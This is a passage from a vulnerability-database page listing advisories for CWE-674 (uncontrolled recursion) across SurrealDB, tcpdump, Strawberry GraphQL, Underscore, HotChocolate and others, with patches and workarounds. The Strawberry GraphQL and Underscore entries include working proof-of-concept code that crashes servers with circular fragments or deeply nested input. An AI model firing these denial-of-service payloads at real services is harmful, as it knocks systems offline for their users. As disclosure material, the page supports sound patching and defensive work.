Common Weakness Enumeration

CWE-674

Allowed-with-Review

Uncontrolled Recursion

Abstraction: Class · Status: Draft

The product does not properly control the amount of recursion that takes place, consuming excessive resources, such as allocated memory or the program stack.

616 vulnerabilities reference this CWE, most recent first.

GHSA-Q8QP-67F9-WR3F

Vulnerability from github – Published: 2026-07-01 20:05 – Updated: 2026-07-01 20:05
VLAI
Summary
SurrealDB vulnerable to Denial of Service due to nested types annotations
Details

The SurrealDB type/kind parser did not enforce the configured recursion depth limit when parsing nested type annotations. The expression parser already enforced the limit for analogous constructs; the kind parser omitted it. An authenticated attacker could send a query with deeply nested type annotations (e.g., array<option<array<option<...>>>>) and exhaust server memory, crashing the process.

This is an incomplete fix for GHSA-6r8p-hpg7-825g, which addressed the same class of bug in the expression parser but did not cover the kind/type annotation parser code path.

Impact

An authenticated user with query execution privileges can crash a SurrealDB server with a single WebSocket message containing deeply nested type annotations.

Patches

A patch has been introduced that wraps parse_concrete_kind and the OPTION<...> arm of parse_inner_kind with enter_object_recursion!, bounding the recursive cycle parse_concrete_kind → parse_inner_kind → parse_inner_single_kind → parse_concrete_kind at the configured object_recursion_limit (default 100). Regression tests cover both cast and DEFINE FIELD paths.

  • Versions 3.1.0 and later are not affected by this issue.

Workarounds

Restrict the ability of untrusted users to execute arbitrary queries via the --deny-arbitrary-query capability flag for the affected user classes (guest, record, or system). Disabling untrusted access to the WebSocket /rpc endpoint also prevents exploitation; the HTTP /sql endpoint's 1 MiB body limit constrains nesting to a depth where OOM is not feasible.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "crates.io",
        "name": "surrealdb"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.1.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-674"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-07-01T20:05:14Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "The SurrealDB type/kind parser did not enforce the configured recursion depth limit when parsing nested type annotations. The expression parser already enforced the limit for analogous constructs; the kind parser omitted it. An authenticated attacker could send a query with deeply nested type annotations (e.g., `array\u003coption\u003carray\u003coption\u003c...\u003e\u003e\u003e\u003e`) and exhaust server memory, crashing the process.\n\nThis is an incomplete fix for [GHSA-6r8p-hpg7-825g](https://github.com/surrealdb/surrealdb/security/advisories/GHSA-6r8p-hpg7-825g), which addressed the same class of bug in the expression parser but did not cover the kind/type annotation parser code path.\n\n### Impact\n\nAn authenticated user with query execution privileges can crash a SurrealDB server with a single WebSocket message containing deeply nested type annotations.\n\n### Patches\n\nA patch has been introduced that wraps `parse_concrete_kind` and the `OPTION\u003c...\u003e` arm of `parse_inner_kind` with `enter_object_recursion!`, bounding the recursive cycle `parse_concrete_kind \u2192 parse_inner_kind \u2192 parse_inner_single_kind \u2192 parse_concrete_kind` at the configured `object_recursion_limit` (default 100). Regression tests cover both cast and `DEFINE FIELD` paths.\n\n- Versions 3.1.0 and later are not affected by this issue.\n\n### Workarounds\n\nRestrict the ability of untrusted users to execute arbitrary queries via the `--deny-arbitrary-query` capability flag for the affected user classes (guest, record, or system). Disabling untrusted access to the WebSocket `/rpc` endpoint also prevents exploitation; the HTTP `/sql` endpoint\u0027s 1 MiB body limit constrains nesting to a depth where OOM is not feasible.",
  "id": "GHSA-q8qp-67f9-wr3f",
  "modified": "2026-07-01T20:05:14Z",
  "published": "2026-07-01T20:05:14Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/surrealdb/surrealdb/security/advisories/GHSA-q8qp-67f9-wr3f"
    },
    {
      "type": "WEB",
      "url": "https://github.com/surrealdb/surrealdb/commit/61d509b766afdf67cc26d8203fd7dc583c8d77aa"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/surrealdb/surrealdb"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "SurrealDB vulnerable to Denial of Service due to nested types annotations"
}

GHSA-Q8WG-HG8M-CHWF

Vulnerability from github – Published: 2022-05-24 16:57 – Updated: 2024-04-04 02:08
VLAI
Details

The SMB parser in tcpdump before 4.9.3 has stack exhaustion in smbutil.c:smb_fdata() via recursion.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-16452"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-674"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-10-03T16:15:00Z",
    "severity": "HIGH"
  },
  "details": "The SMB parser in tcpdump before 4.9.3 has stack exhaustion in smbutil.c:smb_fdata() via recursion.",
  "id": "GHSA-q8wg-hg8m-chwf",
  "modified": "2024-04-04T02:08:19Z",
  "published": "2022-05-24T16:57:47Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-16452"
    },
    {
      "type": "WEB",
      "url": "https://github.com/the-tcpdump-group/tcpdump/commit/24182d959f661327525a20d9a94c98a8ec016778"
    },
    {
      "type": "WEB",
      "url": "https://github.com/the-tcpdump-group/tcpdump/blob/tcpdump-4.9/CHANGES"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2019/10/msg00015.html"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/62XY42U6HY3H2APR5EHNWCZ7SAQNMMJN"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FNYXF3IY2X65IOD422SA6EQUULSGW7FN"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/R2UDPOSGVJQIYC33SQBXMDXHH4QDSDMU"
    },
    {
      "type": "WEB",
      "url": "https://seclists.org/bugtraq/2019/Dec/23"
    },
    {
      "type": "WEB",
      "url": "https://seclists.org/bugtraq/2019/Oct/28"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20200120-0001"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/kb/HT210788"
    },
    {
      "type": "WEB",
      "url": "https://usn.ubuntu.com/4252-1"
    },
    {
      "type": "WEB",
      "url": "https://usn.ubuntu.com/4252-2"
    },
    {
      "type": "WEB",
      "url": "https://www.debian.org/security/2019/dsa-4547"
    },
    {
      "type": "WEB",
      "url": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00050.html"
    },
    {
      "type": "WEB",
      "url": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00053.html"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/fulldisclosure/2019/Dec/26"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-QFWV-87QJ-98XQ

Vulnerability from github – Published: 2026-06-04 14:38 – Updated: 2026-06-09 11:53
VLAI
Summary
Strawberry GraphQL has a Circular Fragment Reference DOS
Details

Summary

The QueryDepthLimiter extension is vulnerable to an Application-level DOS due to a lack of cycle detection in fragment spreads. When a query contains circular fragment references the determine_depth function enters an infinite recursion, leading to a RecursionError and crashing the validation process.

Details

The determine_depth function in query_depth_limiter.py recursively resolves FragmentSpreadNode without maintaining a set of visited fragments. By submitting a query with circular fragment references (e.g., Fragment A $\rightarrow$ Fragment B $\rightarrow$ Fragment A), the validator enters an infinite recursion.

PoC

server code

import strawberry
from fastapi import FastAPI
from strawberry.fastapi import GraphQLRouter
from strawberry.extensions import QueryDepthLimiter

@strawberry.type
class User:
    name: str = "GONA"

@strawberry.type
class Query:
    @strawberry.field
    def user(self) -> User:
        return User()

# Enable depth limiting
schema = strawberry.Schema(
    query=Query, 
    extensions=[QueryDepthLimiter(max_depth=10)]
)

app = FastAPI()
app.include_router(GraphQLRouter(schema), prefix="/graphql")

exploit

import httpx

# Circular reference: A -> B -> A -> B ...
payload = {
    "query": """
        fragment A on User {
            ...B
        }
        fragment B on User {
            ...A
        }
        query Crash {
            user {
                ...A
            }
        }
    """
}

try:
    response = httpx.post("http://127.0.0.1:8000/graphql", json=payload)
    print(response.json())
except Exception as e:
    print(f"Server crashed or timed out: {e}")

Impact

Since the validation happens before execution, an attacker can cheaply trigger this recursion error to exhaust server CPU cycles and thread/worker pools

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.315.6"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "strawberry-graphql"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.71.0"
            },
            {
              "fixed": "0.315.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-47706"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400",
      "CWE-674"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-04T14:38:52Z",
    "nvd_published_at": "2026-06-04T15:16:54Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nThe QueryDepthLimiter extension is vulnerable to an Application-level DOS due to a lack of cycle detection in fragment spreads. When a query contains circular fragment references the determine_depth function enters an infinite recursion, leading to a RecursionError and crashing the validation process.\n\n### Details\nThe determine_depth function in query_depth_limiter.py recursively resolves FragmentSpreadNode without maintaining a set of visited fragments.\nBy submitting a query with circular fragment references (e.g., Fragment A $\\rightarrow$ Fragment B $\\rightarrow$ Fragment A), the validator enters an infinite recursion.\n\n### PoC\n**server code**\n```\nimport strawberry\nfrom fastapi import FastAPI\nfrom strawberry.fastapi import GraphQLRouter\nfrom strawberry.extensions import QueryDepthLimiter\n\n@strawberry.type\nclass User:\n    name: str = \"GONA\"\n\n@strawberry.type\nclass Query:\n    @strawberry.field\n    def user(self) -\u003e User:\n        return User()\n\n# Enable depth limiting\nschema = strawberry.Schema(\n    query=Query, \n    extensions=[QueryDepthLimiter(max_depth=10)]\n)\n\napp = FastAPI()\napp.include_router(GraphQLRouter(schema), prefix=\"/graphql\")\n```\n\n**exploit**\n```\nimport httpx\n\n# Circular reference: A -\u003e B -\u003e A -\u003e B ...\npayload = {\n    \"query\": \"\"\"\n        fragment A on User {\n            ...B\n        }\n        fragment B on User {\n            ...A\n        }\n        query Crash {\n            user {\n                ...A\n            }\n        }\n    \"\"\"\n}\n\ntry:\n    response = httpx.post(\"http://127.0.0.1:8000/graphql\", json=payload)\n    print(response.json())\nexcept Exception as e:\n    print(f\"Server crashed or timed out: {e}\")\n```\n\n### Impact\nSince the validation happens before execution, an attacker can cheaply trigger this recursion error to exhaust server CPU cycles and thread/worker pools",
  "id": "GHSA-qfwv-87qj-98xq",
  "modified": "2026-06-09T11:53:00Z",
  "published": "2026-06-04T14:38:52Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/strawberry-graphql/strawberry/security/advisories/GHSA-qfwv-87qj-98xq"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-47706"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/strawberry-graphql/strawberry"
    },
    {
      "type": "WEB",
      "url": "https://github.com/strawberry-graphql/strawberry/releases/tag/0.315.7"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Strawberry GraphQL has a Circular Fragment Reference DOS"
}

GHSA-QHP4-37X2-X9W9

Vulnerability from github – Published: 2022-05-13 01:08 – Updated: 2022-05-13 01:08
VLAI
Details

An issue was discovered in Poppler 0.74.0. A recursive function call, in JBIG2Stream::readTextRegion() located in JBIG2Stream.cc, can be triggered by sending a crafted pdf file to (for example) the pdfimages binary. It allows an attacker to cause Denial of Service (Segmentation fault) or possibly have unspecified other impact. This is related to JBIG2Bitmap::clearToZero.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2019-9545"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-674"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-03-01T19:29:00Z",
    "severity": "HIGH"
  },
  "details": "An issue was discovered in Poppler 0.74.0. A recursive function call, in JBIG2Stream::readTextRegion() located in JBIG2Stream.cc, can be triggered by sending a crafted pdf file to (for example) the pdfimages binary. It allows an attacker to cause Denial of Service (Segmentation fault) or possibly have unspecified other impact. This is related to JBIG2Bitmap::clearToZero.",
  "id": "GHSA-qhp4-37x2-x9w9",
  "modified": "2022-05-13T01:08:19Z",
  "published": "2022-05-13T01:08:19Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-9545"
    },
    {
      "type": "WEB",
      "url": "https://gitlab.freedesktop.org/poppler/poppler/issues/731"
    },
    {
      "type": "WEB",
      "url": "https://research.loginsoft.com/bugs/recursive-function-call-in-function-jbig2streamreadtextregion-poppler-0-74-0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-QHWP-454G-2GV4

Vulnerability from github – Published: 2025-09-15 00:30 – Updated: 2025-09-26 14:38
VLAI
Summary
Duplicate Advisory: express-xss-sanitizer has an unbounded recursion depth
Details

Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-hvq2-wf92-j4f3. This link is maintained to preserve external references.

Original Descripton

The express-xss-sanitizer package for Node.js has an unbounded recursion in the sanitize function (lib/sanitize.js) when processing JSON request bodies. A remote attacker can send a deeply nested payload to any endpoint that applies this sanitizer, driving excessive recursion and resource consumption (CPU) until the process becomes unresponsive or crashes (e.g., “Maximum call stack size exceeded”). This causes a denial of service. The issue is present through version 2.0.0; no fixed release is available as of this update.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "express-xss-sanitizer"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "2.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-674"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-09-15T20:32:22Z",
    "nvd_published_at": "2025-09-14T23:15:37Z",
    "severity": "MODERATE"
  },
  "details": "## Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-hvq2-wf92-j4f3. This link is maintained to preserve external references.\n\n## Original Descripton\n\nThe `express-xss-sanitizer` package for Node.js has an unbounded recursion in the `sanitize` function (`lib/sanitize.js`) when processing JSON request bodies. A remote attacker can send a deeply nested payload to any endpoint that applies this sanitizer, driving excessive recursion and resource consumption (CPU) until the process becomes unresponsive or crashes (e.g., \u201cMaximum call stack size exceeded\u201d). This causes a denial of service. The issue is present through version 2.0.0; no fixed release is available as of this update.",
  "id": "GHSA-qhwp-454g-2gv4",
  "modified": "2025-09-26T14:38:04Z",
  "published": "2025-09-15T00:30:15Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59364"
    },
    {
      "type": "WEB",
      "url": "https://dbugs.ptsecurity.com/vulnerability/PT-2025-37434"
    },
    {
      "type": "WEB",
      "url": "https://gist.github.com/Spendroslav/177804eaef5acfb222a550de212a1b94"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/AhmedAdelFahim/express-xss-sanitizer"
    },
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/package/express-xss-sanitizer"
    },
    {
      "type": "WEB",
      "url": "https://www.tenable.com/cve/CVE-2025-59364"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Duplicate Advisory: express-xss-sanitizer has an unbounded recursion depth",
  "withdrawn": "2025-09-26T14:38:04Z"
}

GHSA-QPX9-HPMF-5GMW

Vulnerability from github – Published: 2026-03-03 17:46 – Updated: 2026-05-05 22:01
VLAI
Summary
Underscore has unlimited recursion in _.flatten and _.isEqual, potential for DoS attack
Details

Impact

In simple words, some programs that use _.flatten or _.isEqual could be made to crash. Someone who wants to do harm may be able to do this on purpose. This can only be done if the program has special properties. It only works in Underscore versions up to 1.13.7. A more detailed explanation follows.

In affected versions of Underscore, the _.flatten and _.isEqual functions use recursion without a depth limit. Under very specific conditions, detailed below, an attacker could exploit this in a Denial of Service (DoS) attack by triggering a stack overflow.

A proof of concept (PoC) for this type of attack with _.isEqual:

const _ = require('underscore');

// build JSON string for nested object ~4500 levels deep
// (for this to be an attack, the JSON would have to come from
// a request or other untrusted input)
let json = '';
for (let i = 0; i < 4500; i++) json += '{"n":';
json += '"x"';
for (let i = 0; i < 4500; i++) json += '}';

// construct two distinct objects with equal shape from the above JSON
const a = JSON.parse(json);
const b = JSON.parse(json);

_.isEqual(a, b); // RangeError: Maximum call stack size exceeded

A proof of concept (PoC) for this type of attack with _.flatten:

const _ = require('underscore');

// build nested array ~4500 levels deep
// (like with _.isEqual, this nested array would have to be sourced
// from an untrusted external source for it to be an attack)
let nested = [];
for (let i = 0; i < 4500; i++) nested = [nested];

_.flatten(nested); // RangeError: Maximum call stack size exceeded

An application that crashes because of this can be restarted, so the bug is most relevant to applications for which continued operation is important, such as server applications. Furthermore, an application is only vulnerable to this type of attack if ALL of the following conditions are met:

  • Untrusted input must be used to create a recursive datastructure, for example using JSON.parse, with no enforced depth limit.
  • The datastructure thus created must be passed to _.flatten or _.isEqual.
  • In the case of _.flatten, the vulnerability can only be exploited if it is possible for a remote client to prepare a datastructure that consists of arrays at all levels AND if no finite depth limit is passed as the second argument to _.flatten.
  • In the case of _.isEqual, the vulnerability can only be exploited if there exists a code path in which two distinct datastructures that were submitted by the same remote client are compared using _.isEqual. For example, if a client submits data that are stored in a database, and the same client can later submit another datastructure that is then compared to the data that were saved in the database previously, OR if a client submits a single request, but its data are parsed twice, creating two non-identical but equivalent datastructures that are then compared.
  • Exceptions originating from the call to _.flatten or _.isEqual, as a result of a stack overflow, are not being caught.

All versions of Underscore up to and including 1.13.7 are affected by this weakness.

Patches

The problem has been patched in version 1.13.8. Upgrading to 1.13.8 or later completely prevents exploitation.

Note: historically, there have been breaking changes in minor releases of Underscore, especially between versions 1.6 and 1.9. However, upgrading from version 1.9 or later to any later 1.x version should be feasible with little or no effort for all users.

Workarounds

A workaround that works for both functions is to enforce a depth limit on the datastructure that is created from untrusted input. A limit of 1000 levels should prevent attacks from being successful on most systems. In systems with highly constrained hardware, we recommend lower limits, for example 100 levels.

Another possible workaround that only works for _.flatten, is to pass a second argument that limits the flattening depth to 1000 or less.

References

  • https://github.com/jashkenas/underscore/issues/3011
  • https://underscorejs.org/#1.13.8
  • https://underscorejs.org/#flatten
  • https://underscorejs.org/#isEqual
Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.13.7"
      },
      "package": {
        "ecosystem": "npm",
        "name": "underscore"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.13.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-27601"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-674",
      "CWE-770"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-03T17:46:06Z",
    "nvd_published_at": "2026-03-03T23:15:55Z",
    "severity": "HIGH"
  },
  "details": "### Impact\n\nIn simple words, some programs that use `_.flatten` or `_.isEqual` could be made to crash. Someone who wants to do harm may be able to do this on purpose. This can only be done if the program has special properties. It only works in Underscore versions up to 1.13.7. A more detailed explanation follows.\n\nIn affected versions of Underscore, the `_.flatten` and `_.isEqual` functions use recursion without a depth limit. Under very specific conditions, detailed below, an attacker could exploit this in a Denial of Service (DoS) attack by triggering a stack overflow.\n\nA proof of concept (PoC) for this type of attack with `_.isEqual`:\n\n```js\nconst _ = require(\u0027underscore\u0027);\n\n// build JSON string for nested object ~4500 levels deep\n// (for this to be an attack, the JSON would have to come from\n// a request or other untrusted input)\nlet json = \u0027\u0027;\nfor (let i = 0; i \u003c 4500; i++) json += \u0027{\"n\":\u0027;\njson += \u0027\"x\"\u0027;\nfor (let i = 0; i \u003c 4500; i++) json += \u0027}\u0027;\n\n// construct two distinct objects with equal shape from the above JSON\nconst a = JSON.parse(json);\nconst b = JSON.parse(json);\n\n_.isEqual(a, b); // RangeError: Maximum call stack size exceeded\n```\n\nA proof of concept (PoC) for this type of attack with `_.flatten`:\n\n```js\nconst _ = require(\u0027underscore\u0027);\n\n// build nested array ~4500 levels deep\n// (like with _.isEqual, this nested array would have to be sourced\n// from an untrusted external source for it to be an attack)\nlet nested = [];\nfor (let i = 0; i \u003c 4500; i++) nested = [nested];\n\n_.flatten(nested); // RangeError: Maximum call stack size exceeded\n```\n\nAn application that crashes because of this can be restarted, so the bug is most relevant to applications for which continued operation is important, such as server applications. Furthermore, an application is only vulnerable to this type of attack if ALL of the following conditions are met:\n\n- Untrusted input must be used to create a recursive datastructure, for example using `JSON.parse`, with no enforced depth limit.\n- The datastructure thus created must be passed to `_.flatten` or `_.isEqual`.\n- In the case of `_.flatten`, the vulnerability can only be exploited if it is possible for a remote client to prepare a datastructure that consists of arrays at all levels AND if no finite depth limit is passed as the second argument to `_.flatten`.\n- In the case of `_.isEqual`, the vulnerability can only be exploited if there exists a code path in which two distinct datastructures that were submitted by the same remote client are compared using `_.isEqual`. For example, if a client submits data that are stored in a database, and the same client can later submit another datastructure that is then compared to the data that were saved in the database previously, OR if a client submits a single request, but its data are parsed twice, creating two non-identical but equivalent datastructures that are then compared.\n- Exceptions originating from the call to `_.flatten` or `_.isEqual`, as a result of a stack overflow, are not being caught.\n\nAll versions of Underscore up to and including 1.13.7 are affected by this weakness.\n\n### Patches\n\nThe problem has been patched in version 1.13.8. Upgrading to 1.13.8 or later completely prevents exploitation.\n\n**Note:** historically, there have been breaking changes in minor releases of Underscore, especially between versions 1.6 and 1.9. However, upgrading from version 1.9 or later to any later 1.x version should be feasible with little or no effort for all users.\n\n### Workarounds\n\nA workaround that works for both functions is to enforce a depth limit on the datastructure that is created from untrusted input. A limit of 1000 levels should prevent attacks from being successful on most systems. In systems with highly constrained hardware, we recommend lower limits, for example 100 levels.\n\nAnother possible workaround that only works for `_.flatten`, is to pass a second argument that limits the flattening depth to 1000 or less.\n\n### References\n\n- https://github.com/jashkenas/underscore/issues/3011\n- https://underscorejs.org/#1.13.8\n- https://underscorejs.org/#flatten\n- https://underscorejs.org/#isEqual",
  "id": "GHSA-qpx9-hpmf-5gmw",
  "modified": "2026-05-05T22:01:45Z",
  "published": "2026-03-03T17:46:06Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/jashkenas/underscore/security/advisories/GHSA-qpx9-hpmf-5gmw"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27601"
    },
    {
      "type": "WEB",
      "url": "https://github.com/jashkenas/underscore/issues/3011"
    },
    {
      "type": "WEB",
      "url": "https://github.com/jashkenas/underscore/commit/411e222eb0ca5d570cc4f6315c02c05b830ed2b4"
    },
    {
      "type": "WEB",
      "url": "https://github.com/jashkenas/underscore/commit/a6e23ae9647461ec33ad9f92a2ecfc220eea0a84"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/jashkenas/underscore"
    },
    {
      "type": "WEB",
      "url": "https://underscorejs.org/#1.13.8"
    },
    {
      "type": "WEB",
      "url": "https://underscorejs.org/#flatten"
    },
    {
      "type": "WEB",
      "url": "https://underscorejs.org/#isEqual"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Underscore has unlimited recursion in _.flatten and _.isEqual, potential for DoS attack"
}

GHSA-QQJX-QV79-G2Q3

Vulnerability from github – Published: 2022-05-13 01:42 – Updated: 2022-05-13 01:42
VLAI
Details

There is a stack consumption vulnerability in the lex function in parser.hpp (as used in sassc) in LibSass 3.4.5. A crafted input will lead to a remote denial of service.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2017-11554"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-674"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-07-23T03:29:00Z",
    "severity": "HIGH"
  },
  "details": "There is a stack consumption vulnerability in the lex function in parser.hpp (as used in sassc) in LibSass 3.4.5. A crafted input will lead to a remote denial of service.",
  "id": "GHSA-qqjx-qv79-g2q3",
  "modified": "2022-05-13T01:42:25Z",
  "published": "2022-05-13T01:42:25Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-11554"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sass/libsass/issues/2445"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1471780"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-QR3M-XW4C-JQW3

Vulnerability from github – Published: 2026-04-16 21:09 – Updated: 2026-04-24 20:51
VLAI
Summary
ChilliCream GraphQL Platform: Utf8GraphQLParser Stack Overflow via Deeply Nested GraphQL Documents
Details

Impact

Hot Chocolate's Utf8GraphQLParser is a recursive descent parser with no recursion depth limit. A crafted GraphQL document with deeply nested selection sets, object values, list values, or list types can trigger a StackOverflowException on payloads as small as 40 KB.

Because StackOverflowException is uncatchable in .NET (since .NET 2.0), the entire worker process is terminated immediately. All in-flight HTTP requests, background IHostedService tasks, and open WebSocket subscriptions on that worker are dropped. The orchestrator (Kubernetes, IIS, etc.) must restart the process.

This occurs before any validation rules runMaxExecutionDepth, complexity analyzers, persisted query allow-lists, and custom IDocumentValidatorRule implementations cannot intercept the crash because Utf8GraphQLParser.Parse is invoked before validation. The existing MaxAllowedFields=2048 limit does not help because the crashing payloads contain very few fields.

Severity: Critical (9.1) — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

Patches

  • v12 line: Fixed in 12.22.7
  • v13 line: Fixed in 13.9.16
  • v14 line: Fixed in 14.3.1
  • v15 line: Fixed in 15.1.14

The fix adds a MaxAllowedRecursionDepth option to ParserOptions with a safe default, and enforces it across all recursive parser methods (ParseSelectionSet, ParseValueLiteral, ParseObject, ParseList, ParseTypeReference, etc.). When the limit is exceeded, a catchable SyntaxException is thrown instead of overflowing the stack.

Workarounds

There is no application-level workaround. StackOverflowException cannot be caught in .NET. The only mitigation is to upgrade to a patched version.

Operators can reduce (but not eliminate) risk by limiting HTTP request body size at the reverse proxy or load balancer layer, though the smallest crashing payload (40 KB) is well below most default body size limits and is highly compressible (~few hundred bytes via gzip).

References

  • Fix for v15: https://github.com/ChilliCream/graphql-platform/pull/9528
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "HotChocolate.Language"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "12.22.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "HotChocolate.Language"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "13.0.0"
            },
            {
              "fixed": "13.9.16"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "HotChocolate.Language"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "14.0.0"
            },
            {
              "fixed": "14.3.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "HotChocolate.Language"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "15.0.0"
            },
            {
              "fixed": "15.1.14"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-40324"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-674"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-16T21:09:40Z",
    "nvd_published_at": "2026-04-18T00:16:36Z",
    "severity": "CRITICAL"
  },
